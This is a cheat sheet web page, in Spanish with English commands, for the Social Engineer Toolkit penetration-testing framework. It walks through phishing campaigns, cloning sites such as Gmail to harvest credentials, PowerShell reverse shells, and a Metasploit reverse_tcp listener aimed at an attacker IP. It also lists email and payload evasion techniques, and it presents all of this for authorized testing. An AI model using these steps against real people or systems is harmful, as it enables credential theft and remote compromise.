Herramienta de ingeniero social (SET) Cheatsheet
"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos de SET id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar la Guía PDF SET ■/div titulada
El Social Engineer Toolkit (SET) es un marco de pruebas de penetración de código abierto diseñado para ataques de ingeniería social. Desarrollado por David Kennedy (ReL1K) y el equipo TrustedSec, SET automatiza varios ataques de ingeniería social y proporciona una plataforma integral para probar vulnerabilidades humanas en evaluaciones de seguridad.
Instalación y configuración
Instalación en Kali Linux
# SET comes pre-installed on Kali Linux
setoolkit
# Update SET
cd /opt/set
git pull
Instalación manual
# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/
# Install dependencies
pip3 install -r requirements.txt
# Run setup
python setup.py install
# Launch SET
python setoolkit
Configuración
# Edit configuration file
nano /etc/setoolkit/set.config
# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL
Opciones de menú principal
1) Social-Engineering Ataques
# Launch SET
setoolkit
# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules
Spear-Phishing Attack Vectores
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template
# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload
# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file
# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support
Vectores de ataque del sitio web
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method
# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials
# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance
# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts
Escenarios de ataque
Cosecha temporal
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method
# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import
# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/
Phishing Email Campaign
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack
# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign
# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com
Infectious Media Generator
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator
# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable
# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits
# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable
PowerShell Attack Vectores
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors
# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database
# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system
Técnicas avanzadas
Cargas de pago personalizadas
# Create custom payload
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener
# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP
# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener
Multi-Attack Web Method
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method
# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking
# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage
Arduino-Based Attacks
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector
# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack
# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions
Integración con Metasploit
Configuración de la integración de Metasploit
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config
# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework
# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
Configuración de escucha automatizada
# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup
# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener
Presentación de informes y registro
Credential Reports
# Harvested credentials location
/root/.set/reports/
# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt
# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts
Logros de ataque
# SET log files
/root/.set/logs/
# View attack logs
tail -f /root/.set/logs/set_logfile.log
# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log
# Email logs
tail -f /var/log/mail.log
Custom Reporting
# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log
# Extract IP addresses
grep -oE "\b([0-9]\\\\{1,3\\\\}\.)\\\\{3\\\\}[0-9]\\\\{1,3\\\\}\b" /root/.set/logs/set_logfile.log
# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log
Técnicas de evacuación
Evasión por correo electrónico
# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content
# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading
# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting
Evasión de ataque web
# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers
# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers
# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats
Evasión de carga
# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation
# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables
# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution
Buenas prácticas
Consideraciones jurídicas y éticas
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
Seguridad operacional
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures
# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers
# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal
Metodología de prueba
# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection
# Execution phase
# Payload delivery
# Credential harvesting
# System compromise
# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering
# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary
Solución de problemas
Cuestiones comunes
# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity
# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity
# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework
# Permission issues
# Run as root user
# Check file permissions
# Verify directory access
Arreglos de configuración
# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit # Will recreate config
# Update SET framework
cd /opt/set
git pull
python setup.py install
# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2
# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix